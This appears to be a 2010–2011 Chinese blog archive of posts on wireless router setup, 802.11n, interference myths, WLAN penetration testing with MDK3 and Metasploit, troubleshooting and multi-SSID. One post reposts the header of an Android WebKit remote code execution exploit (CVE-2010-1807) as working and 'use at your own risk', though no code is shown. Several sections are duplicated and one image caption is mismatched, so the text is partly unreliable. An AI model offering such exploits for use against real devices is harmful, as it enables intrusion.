  首先,让我们来看看如何进行基本设置:当连接到无线网络后,在局域网中的任何一台计算机中打开IE浏览器,在地址框中输入 192.168.1.1,再输入登录用户名和密码(用户名默认为空,密码为admin),点击“确定”按钮打开路由器设置页面。在左侧窗口点击“基本设 置”链接,在右侧的窗口中除了可以设置IP地址、是否允许无线设置、 SSID名称、频道、WEP外,还可以为WAN口设置连接类型,包括自动获取IP、静态IP、PPPoE、RAS、PPTP等。例如,使用以太网方式接入 Internet的网络,可以选择静态IP,然后输入WAN口IP地址、子网掩码、缺省网关、DNS服务器地址等内容。最后点击“应用”按钮完成设置。
  在上述设置页面中,为了省去为办公网络中的每台计算机设置IP地址的操作,我们可以点击左侧窗口中的“DHCP设置”链接,在右侧窗口中的“动 态IP地址”选项组中选择“允许”选项来启用DHCP服务器。为了限制当前网络用户数目,还可以设定用户数,例如,更改为6(默认50)。最后点击“应 用”按钮。完成上面介绍的基本设置后,我们还需要为网络环境设置访问控制:办公网络中为了能有效地促进员工工作,提高工作效率,我们可以通过无线路由器提 供的访问控制功能来限制员工对网络的访问。常见的操作包括IP访问控制、 URL访问控制等。
  首先,在路由器管理页面左侧点击“访问控制”链接,接着在右侧的窗口中可以分别对IP访问、URL访问进行设置,在IP访问设置页面输入你希望 禁止的局域网IP地址和端口号,例如,要禁止IP地址为192.168.1.100到192.168.1.102的计算机使用qq,那么可以在“协议”列 表中选择“UDP”选项,在“局域网IP范围”框中输入“192.168.1.100~192.168.1.102”,在“禁止端口范围”框中分别输入 “4000”、“8000”。最后点击“应用”按钮。
  提示:上面的设置是因为qq聊天软件使用的是UDP协议,4000(客户端)和8000(服务器端)端口。如果你不确定哪种协议的端口,可以在 “协议”列表中选择“所有”选项,端口的范围在0~65535之间;要禁止某个端口,例如,FTP端口,可以在范围中输入21~21.对于“冲击波”病毒 使用的RPC服务端口可以输入135~135.
  如果要设置URL访问控制功能,可以在访问控制页面中点击“URL访问设置”链接,在打开的页面中点击“URL访问限制”选项中的“允许”选 项。接着,在“网站访问权限”选项中选择访问的权限,可以设置“允许访问”或“禁止访问”,例如,要禁止访问http://www.xxxx.com这样 的网站,就可以在 “限制访问网站”框中输入http://www.xxxx.com.最后点击“应用”按钮即可。
  提示:最多可以限制20个网站。
  (2)客户端设置
  在办公无线局域网中,客户端设置的方法与家庭无线局域网中的客户端设置方法大致相同,要注意工作室中的所有计算机需要设定相同的访问方式,例如,同为“仅访问点(结构)网络”或同为“任何可用的网络(首选访问点)”。另外,还要将每台计算机的工作组设置为相同的名称。
  总结,在看了两种不同对象的无线局域网组建方式后,相信大家对组建局域网都有了一定的了解。希望可以为一些想组建无线局域网的家庭和企业提供到一点的帮助。
类别:Wireless N.T | Tags: , , | 0 条评论, 543 次阅读
Jan
7
2011
  802.11n的宗旨便是与802.11a/g 无线 LANs (WLAN)共存。如果你已使用了某些11a/g数据应用,如互联网访问、电子邮件等,也无需担心从前的机制会被破坏。在802.11n升级过程中,不管是新增客户还是应用程序,以下几种方法都可供参考:
  ◆操作模式:在greenfield  WLAN中,11n可使用效率更佳的高吞吐量的调制方法,而这种方法只适用于其他11n设备。当新旧设备竞争相同信道时,所有设备都必须足够“谦让”,以免引起冲突。为了确保正常运行,所有802.11n 接入点 (AP) 都支持HT-混合模式,发送一个非HT报文后面跟上一个新的HT报文。在原有设备上每个信道都需要使用这个模式,但是想要关闭该模式也只有11n设备才可以实现。
  ◆20/40 共存: 为了更和谐地共存,11n设备必须在数据传输前对信道保持高度敏感。20/40客户可通过绑定信道(bonded channel)传输40 MHz的数据帧,或者通过主要的绑定信道传输约20 MHz的数据帧。当20/40 AP想要通过次级绑定信道侦测其他AP时,就会失去20MHz的使用权,或者转换到其他不同的信道。这种情况虽然不可避免,但是在5GHz中通过使用信道绑定可以避免。
  ◆PCO(Phased coexistence operation ) 模式: 这种模式可以使802.11n接入点通过交替20和40MHz信道来同时支持新旧客户端。但同时也增加了很多开销和系统延迟,引起敏感应用程序的延时抖动等,因此我们不推荐这种模式。
  ◆双CTS保护: 为了避免与现有11b设备发生冲突,11g设备不得不在每个数据帧前加RTS/CTS或CTS-to-Self 控制帧。而11n则通过双CTS保护扩展了该方法,那就是以HT和非HT格式发送控制帧。所带来的开销有时候是非常有必要的但常常会被避免,因为不和原有客户共享信道。
  显然,频段和信道的使用计划方案在设备系统共存和升级过程中占据着至关重要的地位。例如,考虑把2.4GHz频段中现有的服务集标识符(SSID)中的数据应用程序替代为5 GHz频段SSID上的新的移动应用程序,其中频段频道的划分就是一项繁重的工作。然而,即使双频段客户端只能连接到一个AP电波或信道中,所以可以设计一个新的5GHz SSID来满足所有引用程序的接入需要。
  为了推动这个想法,许多11n AP都支持频段转换控制,频段转换控制中的所有技术都是为了鼓励双频段客户端当AP在同一频段中发现相同SSID时,勇敢地转换到其他频段。虽然频段转换控制可以显著地促进客户端的转换,但是同时也会增加数据漫游时间,加之边缘信号的衰弱,对远程客户端来说,数据传输速率也会有一定程度的降低。
类别:Wireless N.T | Tags: , | 0 条评论, 670 次阅读
Jan
4
2011
  
  谁是无线网络的第一杀手?答案当然是“无线干扰”了。那么当你面对这个无处不在的烦人“杀手”时,你能冷静应对吗?你有正确的处理办法吗?面对网上流传的关于这个“杀手”的种种谣传,究竟哪些是真的,哪些又是假的呢?本文将和大家一起揪出关于无线干扰的八大错误说法。
  错误说法一:部署高密度的无线接入点可以克服无线干扰
  随着无线产品的不断普及,无线路由/AP的价格也在不断下滑,于是很多企业为了解决无线干扰的问题,选择了集中部署无线接入点,这样通过无线频谱的空间复用就可以大大提高无线网络的容量和性能了。理论上来看,在这样部署的空间周围,即使有其它无线干扰,也不会影响内部无线网络的正常工作,但实际应用会是这样吗?
  事实上,如果将无线接入点部署的太过集中,那就必须降低每个接入点的信号传输功率。如果不降低功率,那么每个无线接入点间都会产生相互干扰(也就是我们常说的同频干扰),影响正常使用。为了避免同频干扰,不得不调低接入点的信号传输功率,而一旦调低了信号的传输功率,就难以阻止外围其它高功率无线信号的干扰了。很显然,这是一个鱼和熊掌不能兼得的问题。
  小结:通过集中部署无线接入点确实可以提升无线网络的整体性能,但对克服无线干扰确实没有太大帮助。因此通过集中部署无线接入点来阻止无线干扰这个方法被否定。
  错误说法二:选择5GHz频段就没有无线干扰了
  随着无线应用的快速发展,无线路由、无线键鼠、无绳电话、无线耳机以及蓝牙等已经将2.4GHz这个公共无线频段挤得拥挤不堪。于是有些无线产品开始率先尝试双频段设计,即同时支持2.4GHz和5GHz。
  那么选择了5GHz频段就能逃开无线干扰了吗?当然不能。不可否认,与2.4GHz频段产品相比,现阶段会造成5GHz频段干扰的产品确实比较少,甚至在日常生活中很难遇到。但这样的情况正在发生着改变,越来越多的厂商开始认识到5GHz的优势,就像当年从900MHz转到2.4GHz来避免干扰一样,5GHz同样逃不过这样的命运。而且目前已经有采用5GHz的无绳电话、雷达、感应设备投入使用了。
  小结:5GHz确实逃离了现阶段2.4GHz的拥堵,但它避免不了无线干扰,因为越来越多的设备开始挤进5GHz这条“高速公路”。所以选择5GHz来避免无线干扰这个方法也被否定。
  错误说法三:电器设备对无线干扰小
  前面介绍过了很多无线设备对无线网络的干扰,但你知道家用电器设备也会对无线信号产生干扰吗?
  在我们的日常生活中,微波炉、空调、冰箱这些大功率设备都会对无线信号造成干扰,而且这样的干扰并非可以忽视。不信?那就来看看我们的实际测试。
  我们把一台11n无线路由器放在微波炉的旁边,然后分别在开启和关闭微波炉的状态下测试无线网络的传输效果,一起来看看结果如何吧。
  未开启微波炉:
  点击在新窗口中浏览此图片
  平均速率:75Mbps
  开启微波炉:
  点击在新窗口中浏览此图片
  平均速率:49Mbps
  通过对比结果非常明显,在开启微波炉的状态下,无论是无线传输速率,还是无线网络的稳定性均有明显的下降,可见家电产品的“威力”还是非常强大的。
  小结:家用电器对无线网络的干扰是非常明显的,尤其是大功率家电设备,影响更为严重。因此,对于家用电器对无线干扰小这个说法同样被否定。
  错误说法四:自选信道可以完全信赖
  无线信道同样影响着无线网络,如果同一时间某个信道被多个无线接入点占据,那么此时的无线网络一定会受到干扰。而现在的无线路由/AP一般都具有自选信道的功能,所以很多用户为了方便,就把信道设置为了“自动选择”。
  但在实际使用中,自选信道却不是那么灵敏,因为周边的无线网络环境是在随时发生变化的。而一般的无线路由/AP在自动选择信道后,就不会再自动改变了,无论此时该信道是否拥挤。
  点击在新窗口中浏览此图片
  自选信道
  如图所示,虽然选择了“自动选取”信道,但随着网络环境的变化,信道9已经变得非常拥挤,此时如果继续使用该信道,无线网络的使用效果将会变得很差。
  小结:如果选择了“自动选取”信道,那么在实际使用中很可能会遇到网络突然变慢或网络不稳等情况。此时建议大家根据无线信道的使用情况来修改当前的信道,这样可以获得更好的无线网络体验。因此,自选信道可以完全信赖这个说法同样被否定。
  错误说法五:无线干扰只影响性能 不影响安全
  很多用户觉得无线网络的带宽高,尤其是11n网络,理论带宽可达300Mbps,所以就算无线被干扰了,最多也就影响些无线性能,没什么可担心的。
  但事实上真的如此吗?其实很多的无线干扰都是伴随着危险的,例如你在家中通过无线网络上网,突然发现网络变得很慢、很卡。如果此时你仅仅认为是无线网络干扰造成的,那么你个人的数据资料就危险了,因为此时很可能是你的“邻居”正在通过“蹭网卡”盗用你的网络。当然,他盗走的不仅仅是你的网络带宽,还很可能盗取了你的个人资料信息。另外,除了“蹭网卡”,网络病毒也有类似的效果,它在干扰你无线网络的同时,也在窃取着你的重要数据信息。
  小结:通过上面的介绍我们不难看出,当无线网络受到干扰时,性能影响仅是表面现象,安全问题才是关键。因此,无线干扰只影响性能,不影响安全这个说法同样被否定。
  错误说法六:无线网络降速一定是因为无线干扰
  我们知道,无线干扰会影响无线网络的整体性能,具体表现就是降低无线传输速率。那么当无线网络的速度突然降低时,一定是因为无线干扰造成的吗?答案当然是否定的。
  例如我们在通过11n的无线局域网传输数据资料时,又有一个无线客户端接入了此无线网络,而此时你突然发现传输速率变慢了很多。这确实有可能是无线干扰造成的,但也很可能是那个新加入的客户端造成的。
  点击在新窗口中浏览此图片
  设置为混合模式
  如图所示,虽然选择了“自动选取”信道,但随着网络环境的变化,信道9已经变得非常拥挤,此时如果继续使用该信道,无线网络的使用效果将会变得很差。
  小结:如果选择了“自动选取”信道,那么在实际使用中很可能会遇到网络突然变慢或网络不稳等情况。此时建议大家根据无线信道的使用情况来修改当前的信道,这样可以获得更好的无线网络体验。因此,自选信道可以完全信赖这个说法同样被否定。
  错误说法五:无线干扰只影响性能 不影响安全
  很多用户觉得无线网络的带宽高,尤其是11n网络,理论带宽可达300Mbps,所以就算无线被干扰了,最多也就影响些无线性能,没什么可担心的。
  但事实上真的如此吗?其实很多的无线干扰都是伴随着危险的,例如你在家中通过无线网络上网,突然发现网络变得很慢、很卡。如果此时你仅仅认为是无线网络干扰造成的,那么你个人的数据资料就危险了,因为此时很可能是你的“邻居”正在通过“蹭网卡”盗用你的网络。当然,他盗走的不仅仅是你的网络带宽,还很可能盗取了你的个人资料信息。另外,除了“蹭网卡”,网络病毒也有类似的效果,它在干扰你无线网络的同时,也在窃取着你的重要数据信息。
  小结:通过上面的介绍我们不难看出,当无线网络受到干扰时,性能影响仅是表面现象,安全问题才是关键。因此,无线干扰只影响性能,不影响安全这个说法同样被否定。
  错误说法六:无线网络降速一定是因为无线干扰
  我们知道,无线干扰会影响无线网络的整体性能,具体表现就是降低无线传输速率。那么当无线网络的速度突然降低时,一定是因为无线干扰造成的吗?答案当然是否定的。
  例如我们在通过11n的无线局域网传输数据资料时,又有一个无线客户端接入了此无线网络,而此时你突然发现传输速率变慢了很多。这确实有可能是无线干扰造成的,但也很可能是那个新加入的客户端造成的。
  点击在新窗口中浏览此图片
  设置为混合模式
类别:Wireless N.T | Tags: , | 0 条评论, 662 次阅读
Jan
4
2011
由于802.11n技术所实现的速度和可靠性,许多公司正开始使用带宽更大的无线LAN来支持新的移动服务。但是这个变化需要进行更复杂和更可靠的WLAN测试,以验证网络的安全性、连接性和性能。

公司可以不再需要使用耗费人力的工具来检查信号强度、服务器可访问性和Wi-Fi漏洞。测试在地理位置上分散的整个企业网络的成百上千的接入端(AP)和无数的客户端需要使用更高效的自动化工具和方法。

在许多早期的Wi-Fi部署中,安全性意味着检查整个建筑物或园区,监听陌生信号,以便发现未授权的恶意AP。这不仅极为低效,而且经常会“阻碍”许多识别错误的AP,也会忽视其他的一些威胁,如配置错误和操作不当的客户端。

使用具有无线入侵防御系统的AP进行全天监控

随着Wi-Fi越来越流行,许多AP经过更新后能够监听频道内或频道外的流氓信号。另外专门的Wireless Intrusion Prevention Systems (WIPS),也可用于全天监控无线攻击或违规行为,以及响应临时阻挡和发现嫌疑的流氓信号。

然而,这两个方法已经开始融合到一起。许多企业AP现在能够在需要时变成专职WIPS探测器,而且有几个AP供应商也提供了专用的WIPS设备。现在争论的重点越来越不在于扫描的频率,24/7是依赖无线的企业必须要求实现的。相反,合理的安全任务和符合规范要求则占据了核心地位。

集中的WLAN评估工具保证了规范性

为了符合像PCI DSS或Federal Information Security Management Act (FISMA)这样的规范,组织必须证明安全控制的有效性,并记录嫌疑违反规范的情况。现在,许多商业WIPS和一些WLAN管理器能够根据流行的行业规范产生封闭的规范报告,但是仍然需要持续地评估这些安全性控制和政策。

许多公司都雇佣第三方审计人员到现场执行评估;例如,要在一个商店中验证PCI DSS规范。然而,在进行这个审计之前,我们最好先测试一些有问题的地方,然后在它们暴露之前修复 这些问题。理想情况下,这些自我评估应该定期进行,而且不会消耗太多的员工时间,不需要太多的现场调查费用。

这正是集中评估工具发挥作用的地方。例如,AirTight Networks使用基于云的WIPS与上述探测器通信来实现每季度的PCI扫描和修复服务。这些探测器会监听邻近的流量,并探测Cardholder Data Environments (CDEs)的无线漏洞,从而产生PCI DSS 1.2规范所要求的月扫描报告(至少)。

对于那些已经部署了WIPS的公司而言,像Motorola AirDefense提供的无线漏洞评估模块等插件能够将部署的探测器变成远程测试引擎,它们能够周期性地连接AP,探测暴露的端口和URL,并生成记录结果的报告。

自动的远程安全性扫描,不管是由本身的WIPS执行,或者是云服务实现,都能够实现廉价的常规自我评估。然而,它们并不能替代不定期的人工现场渗透测试。

非自动化WLAN测试——渗透测试

查找可能淹没客户端、AP和WLAN管理器的盲点、错误和新攻击是WLAN测试的重要组成部分。然而,这种无线测试还没有实现完全的自动化。

例如,MDK3是一个命令行工具,它可用于猜测隐藏的SSID和MAC ACL,寻找客户端的认证漏洞,并发送802.11 Beacon、Deauth和TKIP MIC DoS攻击。审计人员可以使用MDK3方便地在不同的位置发起这些渗透测试,如办公室内部和外部。然而,诸如MDK3等工具绝不应该在工作时间内对生产环境WLAN执行测试,因为生产使用需要人工指引和结果解释。

集中的渗透测试工具经常可用于发现影响WLAN安全性的较上层的系统漏洞。例如,Metasploit脚本能够尝试许多不同的有线和无线LAN应用程序。如果要对一个大型网络执行更高效的Metasploit测试,我们可以考虑Rapid7的Metasploit Pro,它可以从一个中央控制台执行多层次的远程渗透测试。
类别:Wireless N.T | Tags: , | 0 条评论, 513 次阅读
Jan
4
2011
无线网络出现故障,总会让网络管理员烦恼。有一些常规的故障还是比较容易排查的,但是有些就没有那么容易了。下面介绍的是关于一些无线网络故障做的排查工作,看看具体是怎么操作的呢?

无线路由器进行无线上网,已经变得逐步普及起来。不过,在无线上网的过程中,我们常常会遭遇到各式各样的无线网络故障,这些网络故障严重影响了正常的上网效率。事实上,我们只要在平时加强排查,及时总结各种常见无线网络故障的排除经验,相信日后我们一定能成为一名管理无线网络的行家里手!

排查连接线路,解决只发不收的无线网络故障

查看无线网络连接状态信息时,我们有时会看到无线网络可以对外发送信息,但无法从外部接收信息,这种单向通信的方式显然会影响我们正常的无线访问操作。当不幸遭遇到无线网络单向通信的麻烦时,我们可以按照如下思路进行逐一排查:

首先要保证无线网络连接线路处于通畅状态。在查看线路是否处于连通状态时,我们可以先打开IE浏览器,并在弹出的浏览窗口地址栏中输入路由器默认使用的IP地址(该地址一般能够从路由器的操作说明书中查找到),之后正确输入路由器登录帐号,打开路由器的后台管理界面。接着在该管理界面中执行ping命令,来ping一下本地Internet服务商提供的DNS服务器地址,要是目标地址能够被ping通的话,那就表明路由器设备到Internet服务商之间的线路连接处于畅通状态,要是目标地址无法被ping通的话,那说明路由器内部的部分参数可能没有设置正确,这时我们就必须对路由器内部的配置参数进行一下逐一检查。

在确认路由器内部配置参数都正确的前提下,我们可以在局域网中找一台网络配置正确、上网正常的工作站,并在该工作站中执行ping命令,来来ping一下路由器使用的IP地址,要是该地址可以被正常ping通的话,那就意味着局域网内部的线路连接也处于畅通状态,要是ping不通路由器使用的IP地址时,那我们就有必要检查本地工作站使用的网络参数与路由器使用的网络参数是否相符合,也就是说它们的地址参数是否处于同一网段内。要是上面的各个地址都能被顺利ping通,但无线网络连接仍然处于只发不收的状态时,那我们不妨重点检查一下本地工作站的DNS参数以及网关参数设置是否正确,在确认这些参数正确后,我们还需要再次进入到路由器后台管理界面,从中找到NAT方面的参数设置选项,并检查该选项配置是否正确。在进行这项参数检查操作时,我们重点要检查一下其中的NAT地址转换表中是否有内部网络地址的转译条目,要是没有的话,那只发不收无线网络故障多半是由于NAT配置不当引起的,这时我们只要将内部网络地址的转译条目正确添加到NAT地址转换表中就可以了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。
类别:Wireless N.T | Tags: , | 0 条评论, 530 次阅读
Jan
4
2011
点击在新窗口中浏览此图片  
  把一台无线路由器变成2台、4台甚至8台无线路由器?这有可能吗?答案当然是肯定的。只要你的无线路由器支持多SSID功能,你就可以体验这“一个变多个”的神奇应用了。那么这个神奇的多SSID功能究竟是什么呢?让我们一起来了解下。
  说到多SSID功能,首先就要说说SSID,相信使用过无线网络的用户都知道,SSID(即Service Set Identifier,服务设置标识)就是我们常说的无线网络名称,为了便于区分自己和他人的无线网络,我们常常会在无线路由的Web配置界面中重新设置这个名称(图中红框所示)。
点击在新窗口中浏览此图片
  SSID和多SSID
  了解了SSID,多SSID功能就很容易理解了。简单来说多SSID功能就是通过设置多个SSID(图中黄框所示),实现一台无线路由器布置多个无线接入点,用户可以连入不同的无线局域网,避免相互之间的干扰。当然,实际上所有的用户还是连入了同一个无线路由器,只不过每组SSID之间是相互隔开的。
  那么多SSID功能适用于哪些用户群呢?首先应该是小型企业用户,例如一个小型企业有4个部门:技术部、行政部、销售部、财务部,每个部门都希望有独立的无线局域网,显然购买四个无线路由器非常不划算,此时多SSID功能就能派上用场。另外,对于合租用户来说,多SSID功能同样适用,每个租户都可以有自己专属的无线局域网,保证各自信息数据的安全。
  通过上面的介绍,相信你已经对多SSID功能充满了兴趣,那么它的实际应用效果如何呢?我们一起来试试看。
  体验一变多:设置多个SSID
  多SSID功能的设置非常简单,我们只需登录到无线路由器的Web配置界面,找到“无线设置”菜单,然后输入多个无线网络名称即可(如图)。一般的无线路由器可以支持4组SSID,最多的可以支持8组SSID。
  多SSID设置
  如图所示,我们选用的这款无线路由器最多可以支持8组SSID,我们设置了其中的6组,分别以ZOL1-6为无线网络的名称。这里还需要说明的是,如果想实现每个SSID间(每个无线局域网)的相互隔离,一定要启用“SSID间隔离”功能。而如果每个无线客户端都想相互隔离,还可以启动“AP内部隔离”功能。
  好啦,多SSID功能设置完毕了,那么如何保证自己专属的无线局域网不被他人非法“入侵”呢?答案当然是给无线网络加密了。加密过程十分简单,只需找到“安全设置”菜单,然后为每个SSID设置无线加密即可(如图)。
点击在新窗口中浏览此图片

  无线加密设置
  如图所示,我们需要为6组SSID分别设置无线加密方式,在此建议大家选择WPA/WPA2级别的加密,可以保证无线网络更加安全。另外需要提醒的是,加密方式选择相同,但通行口令可不能设置为同一个哦。
  OK,一切设置完毕,马上去看看无线列表中有没有出现这些SSID的身影吧。
  搜索无线网络 多个SSID任你选
  我们通过无线网卡的应用程序搜索无线网络,结果如下:
点击在新窗口中浏览此图片
  搜索无线网络
  我们可以看到,此前设置的6组SSID均可以搜索到,并且信号非常强劲。下面再看看专业软件的搜索结果:
点击在新窗口中浏览此图片
  无线网络搜索结果
  通过WirelessMon软件搜索无线网络,同样可以搜索到6组SSID。不过这6组SSID全部占用信道9,在实际应用中可能会出现相互干扰的现象。
  实际连接测试
  我们选择了4台笔记本(A、B、C、D表示)分别连入ZOL1、2、3、4的无线网络,看看效果如何:
点击在新窗口中浏览此图片
  我们可以看到,4台笔记本分别顺利连入了4个无线网络,并且显示的无线连接速率均超过270Mbps,那么在实际使用中真的能有如此优异的表现吗?每个无线局域网都是均分网络带宽的吗?我们通过实际测试来看看。
  体验多SSID实际应用效果
  为了验证多SSID功能的实际使用效果及网络带宽是否平均分配的问题,我们通过笔记本A、B、C、D(已经分别连入ZOL1、2、3、4无线网络)同行进行迅雷下载,下载最新的QQ2010版软件,软件大小为32.65MB。(PS:在测试地点单独下载此软件的平均速率约为800KB/s)
点击在新窗口中浏览此图片
  笔记本A:平均下载速度201KB/s
点击在新窗口中浏览此图片
  笔记本B:平均下载速度156KB/s
点击在新窗口中浏览此图片
  笔记本C:平均下载速度239KB/s
点击在新窗口中浏览此图片
  笔记本D:平均下载速度146KB/s
  通过4台笔记本的同时下载测试,我们可以看出4组SSID的表现还是非常不错的,基本上是平均分配了原有的网络带宽。也就是说,如果你设置了2组SSID,那么每个无线局域网的带宽将变为原有的二分之一;如果设置了4组SSID,那么每个无线局域网的带宽将变为原有的四分之一;以此类推。当然,如果你的无线路由的多SSID功能还支持QoS控制,那么你就可以为每组SSID设置不同的带宽,并设置优先级,这样可以更加充分的利用原有的网络带宽,从而获得更好的无线应用体验。
  多SSID功能的不足
  多SSID虽然可以实现“一变多”的功能,但它的使用空间比较有限,因为1台无线路由器的信号覆盖范围是有限的,所以如果你想使用无线路由的多SSID功能,那么它的应用区域最好不要超过200㎡;另外,由于多SSID功能是平均分配网络带宽的,所以对原有的网络带宽也有一定要求,如果带宽过低(<2M)或无线客户端过多(>20个),就不建议大家使用此功能了。最后,还要提醒一点,很多无线路由器的最后一组SSID都采用了默认的固定带宽,其往往低于前几组SSID平均分配的带宽,所以在实际应用中一定要注意这一点,尽量不使用最后一组SSID。
  总结:多SSID功能 让网络更安全
  选择多SSID这个功能,除了可以获得多个无线局域网外,它更多的的意义在于保证无线网络的安全。尤其是对于小型企业用户来说,每个部门都有自己的数据隐私需求,如果共用同一个无线局域网,很容易出现数据被盗的情况,而选择了多SSID功能,每个部门都能独享专属的无线局域网,让各自的数据信息更加安全,更有保障。
类别:Wireless N.T | Tags: , , | 0 条评论, 983 次阅读
Dec
9
2010
Android 2.0/2.1
Android 2.0/2.1: 2009 年 10 月 26 日,又一个主要版本升级以创纪录的速度放出。这次,大版本升级到了Android 2.0/2.1 “Eclair.” 它包含:
    
  Android 2.0/2.1主要特性
  提升硬件速度
  更多屏幕以及分辨率选择
  大幅度的用户界面改良
  支持 Exchange活动墙纸
  大幅改进虚拟键盘
  蓝牙 2.1
  Google 地图 3.1.2
  中国首款2.0手机摩托罗拉XT800Android 2.0.1 SDK 于 2009 年 12 月 3 日 发布,之后是2010 年 1 月 10 日的 2.1 版本。很多用户和围观群众可能会奇怪:“为什么 Android 会用甜点作为它们系统版本的代号?”,这个命名方法开始于 Andoird 1.5 发布的时候。作为每个版本代表的甜点的尺寸越变越大,然后按照字母数序:小蛋糕,甜甜圈还有松饼。之前人们预计 2.2 版本的代号会是“馅饼”,但这个被最终证明是错误的,“FroYo”(冻酸奶)才是 Android 2.2 这个伴随 Google Nexus One 发布的新版的最新代号。下一个版本的代号将会是“姜饼”。
  Android 2.2  该版本名字叫 “Froyo”,中文代号称“冻酸奶”,Nexus One 的用户已经开始接受 Android 2.2 “FroYo” 的无线更新,其他机型的用户应该会在短时间内获取到这一更新。这一版本包含大量让其他手机用户垂涎三尺的更新,包括了:
Android 2.2主要特性 完整的 Flash 10.1 支持

最高 5 倍速度提升

最多支持 8 个设备连接的移动热点功能

有着专用链接的改进版主屏幕

大量 Exchange 支持改进,支持 Exchange 2010,包括远程数据抹除,自动发现服务,完整的日程表支持,全局联系人列表查找。

摄像头/视频改进,比如:更好的屏幕控制按钮,人民群众喜闻乐见的录像时开启闪光灯进行照明的功能。

多键盘语言支持

Android 云信息将应用安装在记忆卡上

蓝牙语音拨号

支持720P视频录制

溢出代码 转载于http://bigpack.blogbus.com/logs/84421745.html
**************************************************************
这个是利用Safari实现的远程代码执行漏洞exploit,经测试,对Android2.0/2.1系统有效,使用者后果自负。

****************************************************************
# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807

*Better exploit (better rate and more flexible for changes, also shorter shellcode) than what you have, plus, it's also verified. Enjoy!
More details at : *http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*

Enjoy!

Twitter account : @ihackbanme
*****************************************************************
类别:Wireless N.T | Tags: , , , , | 0 条评论, 784 次阅读
Nov
18
2010
一、合理摆放无线路由器的位置

由于无线信号在穿越障碍物后,尤其是在穿越金属后,信号会大幅衰减。而在我们家庭的房子里,有很多钢筋混凝土墙,所以为了增强无线网络信号,我们在摆放无线路由器的时候,应该使信号尽量少穿越墙壁。

我们一般很少会在厨房或餐厅里上网,而书房和卧室是我们平时经常上网的地方,所以我们在选择无线路由器的摆放位置的时候,可以选择离厨房和餐厅远一些地方,而尽量靠近书房和卧室。

书房外墙处是摆放无线路由器的理想位置,这样摆放能够使客厅,书房,主卧,次卧都有一个比较好无线信号。当然,不同家庭结构都不一样,大家应该视具体情况而定。一般来说,无线网卡的客户端都具备信号强度的检测能力,大家拿笔记本在房间各处查看信号强度,从而选择一个最佳的摆放点。另外也可以安装Network Stumbler软件来检测信号的强度。

二、修改信号频道减少干扰

我们在无线路由器的配置界面里,会看到无线信道的选项。一般来说,54M的无线信道有11个,依次是信道1到信道11。当有多个无线信号在使用同一个无线信号频道的话,就会出现信号干扰。

很多用户在购买无线路由器使用后,并未对无线信号频道能进行修改,这样大家使用的都是路由器默认配置时的信道,这样就很容易发生信道的干扰。如果附近有邻居使用的信道跟我们的一样,那么,我们双方的无线信号都会受到影响。

所以,为了增强无线网络信号,我们同样可以使用Network Stumbler软件来进行扫描,看看附近都存在哪些无线信号,使用的是哪个信道。然后对我们自己的无线信道进行修改,避免与其他信道重复。

另外大家要注意的是,一个频道的信号会同时干扰与其相邻的两个频道,即频道6的信号会影响到频道5和频道7,所以我们在设置无线信道的时候,应该尽量使自己的信道离其他信号频道两个以上。

另外,很多家电用品在工作的时候也会对无线网络造成电磁干扰,所以无线路由器的摆放也应该尽量远离这些家电。

三、扩展天线增强信号

